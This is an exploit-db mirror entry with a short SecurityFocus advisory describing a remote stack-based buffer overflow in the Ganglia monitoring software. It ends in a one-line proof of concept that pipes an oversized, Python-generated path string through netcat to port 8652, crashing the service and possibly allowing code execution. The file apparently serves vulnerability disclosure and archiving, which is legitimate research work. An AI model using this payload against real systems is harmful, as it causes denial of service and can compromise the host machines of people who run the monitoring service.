exploit-db-mirror/platforms/linux/dos/32726.txt
Offensive Security 637e59de55 Updated 04_09_2014
2014-04-09 04:32:27 +00:00

7 lines
No EOL
532 B
Text
Executable file

source: http://www.securityfocus.com/bid/33299/info
Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input.
Attackers can leverage this issue to execute arbitrary code in the context of the application. Successful exploits will compromise the application and the underlying computer. Failed attacks will cause denial-of-service conditions.
echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652